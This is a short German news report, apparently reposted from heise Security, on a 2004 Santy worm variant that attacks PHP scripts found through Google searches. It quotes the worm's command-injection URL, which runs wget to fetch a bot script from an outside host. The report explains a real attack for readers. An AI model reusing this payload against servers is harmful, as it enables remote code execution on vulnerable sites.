Wurm attackiert PHP-Skripte
Die bereits gestern gemeldete Santy-Version mit Yahoo-Suche hat es offenbar in sich. heise Security erreichen immer mehr Berichte von attackierten Servern. Der Wurm verbindet sich unter anderem mit einem IRC-Server, in dessen Wurm-Channel bereits über 700
2004-12-26 00:00:00 2004-12-26 00:00:00 admin
Offenbar versucht der Wurm systematisch Schwachstellen in PHP-Skripten zu finden, um sich zu verbreiten. Dazu sucht er auf der brasilianischen Google-Seite nach URLs mit PHP-Skripten und probiert alle Variablen durch, die er aus der gefundenen URL extrahieren kann. In diese schreibt er über die URL Code der Form:
http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;
wget www.visualcoders.net/spybot.txt;
Ãberprüft das Skript den Inhalt der Variablen nicht ausreichend, werden unter Umständen die in der URL aufgeführten Kommandos ausgeführt. Der überlaufende IRC-Channel beweist, dass der Wurm mit dieser einfachen Vorgehensweise anscheinend erschreckend oft Erfolg hat. Der Wurm erzeugt mit den Anfragen eine beträchtliche Last auf dem Server.
hiese.de
Erfahrungen
Hier Kannst Du einen Kommentar verfassen
Verwandte Beiträge
PHP Summit – Spring
Vom 21 bis 23. März 2011 präsentiert das PHP Magazin und die Entwickler Akademie den nächsten PHP Summit ...
Autor :
admin
Kategorie:
Software & Web-Development
PHP 5.2.5 beseitigt nicht nur Fehler
Die neue PHP-Version 5.2.5 beseitigt nicht nur Fehler, sondern bringt auch einige kleinere Verbesserungen mit. Insgesamt wurden 60 Bugs beseitigt und damit auch einige Sicherheitslücken geschlossen. golem.de ...
Autor :
admin
Kategorie:
Software & Web-Development
PHP 4.3.2RC3 veröffentlicht
Dies ist das dritte und letzte Release und sollte keine kritischen Bugs und Probleme mit sich bringen. Download unter http://qa.php.net/ ...
Autor :
admin
Kategorie:
Software & Web-Development
Toshiba revolutioniert die DVD: DVD könnte bald abgelöst werden
Der Trick den Toshiba verwendet, ist ein blauer Laser, der mit einer Wellenlänge von 405 nm arbeitet. Die neuen DVDs, haben die Normgrösse einer CD, fassen aber pro Schicht und Seite 30 GB Daten. Alte DVDs schaffen nur 4,7 GB Daten pro Schicht und Se ...
Autor :
admin
Kategorie:
Software & Web-Development
Urteil gegen Spammer erwartet
Der 24-jährige Jason Smathers, ein ehemaliger AOL-Mitarbeiter, hat sich am Freitag vor dem Bundesgericht Manhattan erneut schuldig bekannt. Er hat zugegeben, eine Liste mit 92 Millionen E-Mail-Adressen von über 30 Millionen AOL-Kunden an einen Spammer ver ...
Autor :
admin
Kategorie:
Software & Web-Development
PremiumSoft veröffentlicht MySQL Studio version 4.4
PremiumSoft veröffentlicht MySQL Studio version 4.4 Grafische Oberfläche für Ihre MYSQL Datenbank Mit dem PremiumSoft MySQL Studio ist eine grafische Oberfläche für Ihre MYSQL Datenbank. Dieses Tool ermöglicht es Reports auf einfache Art und Weise z ...
Autor :
admin
Kategorie:
Software & Web-Development

